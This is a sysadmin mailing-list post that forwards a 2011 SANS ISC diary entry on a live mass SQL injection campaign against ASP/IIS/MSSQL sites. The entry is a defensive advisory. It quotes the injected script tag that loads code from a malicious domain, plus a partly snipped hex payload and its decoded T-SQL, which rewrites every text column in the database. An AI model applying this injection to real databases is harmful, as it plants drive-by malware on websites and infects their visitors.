Just fyi, for the list (Sorry if its already been posted I looked and didn't see it).
http://isc.sans.edu/diary.html SQL Injection Attack happening ATM<http://isc.sans.edu/diary/SQL+Injection+Attack+happening+ATM/12127> <http://isc.sans.edu/diary.html> 29<http://isc.sans.edu/diary.html> Published: 2011-12-01, Last Updated: 2011-12-02 11:24:01 UTC by Mark Hofman (Version: 1) Rate this diary: 13 comment(s)<http://isc.sans.edu/diary.html?storyid=12127#comment> We've had several reports (thanks guys) of sites being injected with the following string: "></title><script src="hXXp://lilupophilupop.com/sl.php"></script> Typically it is inserted into several tables. From the information gathered so far it looks targeted at ASP, IIS and MSSQL backends, but that is just speculation. If you find that you have been infected please let us know and if you can share packets, logs please upload them on the contact form. Mark UPDATE: Thanks to those that posted comments and those that worked behind the scenes. The injection string is along the lines Terry posted in his comments. the one I ran across is (note not the whole string is provided) 73657420616e73695f7761726e696e6773206f6666204445434c415245204054205641524348415228323535292c404 320564152434841522832353529204445434c415245205461626c655f437572736f7220435552534f5220464f5220736 56c65637420632e---------snip----------9746c653e3c7363726970742727202729204645544348204e4558542046524f4d 205461626c655f437572736f722049444f2040542c404320454e4420434c4f5345205461626c655f437572736f7220444 5414c4c4f43415445205461626c655f437572736f72+as+varchar%284000%29%29+exec%28%40s%29 Which decodes to: declare+@s+varchar(4000)+set+@s=cast(0xset ansi_warnings off DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select c.TABLE_NAME,c.COLUMN_NAME from INFORMATION_SCHEMA.columns c, INFORMATION_SCHEMA.tables t where c.DATA_TYPE in ('------SNIP------- IN EXEC('UPDATE ['+@T+'] SET ['+@C+']=''"></title><script src="XXXX://lilupophilupop.com/sl.php"></script><!--''+RTRIM(CONVERT(VARCHAR(6000),['+@C+'])) where LEFT(RTRIM(CONVERT(VARCHAR(6000),['+@C+'])),17)<>''"></title><script'' ') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor+................ When discovered yesterday about 80 sites showed in Google, this morning about 200, by lunch 1000 and a few minutes ago 4000+. Targets include ASP sites and Coldfusion (Thanks Will) The attack seems to work on all versions of MSSQL. The hex will show in the IIS log files, so monitor those. Make sure that applications only have the access they require, so if the page does not need to update a DB, then use an account that can only read. Sources of the attack vary, it is automated and spreading fairly rapidly. As one of the comments mentioned it looks like lizamoon which infected over 1,000,000 sites earlier this year. The trail of the files ends up on "adobeflash page" or fake AV. Blocking access to the lilupophilupop site will prevent infection of clients should they hit an infected site and be redirected. Mark H - Shearwater<http://www.shearwater.com.au> Keywords: SQL Injection attack<http://isc.sans.edu/tag.html?tag=SQL%20Injection%20attack> Top of page<http://isc.sans.edu/diary.html> ~ Finally, powerful endpoint security that ISN'T a resource hog! ~ ~ <http://www.sunbeltsoftware.com/Business/VIPRE-Enterprise/> ~ --- To manage subscriptions click here: http://lyris.sunbelt-software.com/read/my_forums/ or send an email to [email protected] with the body: unsubscribe ntsysadmin
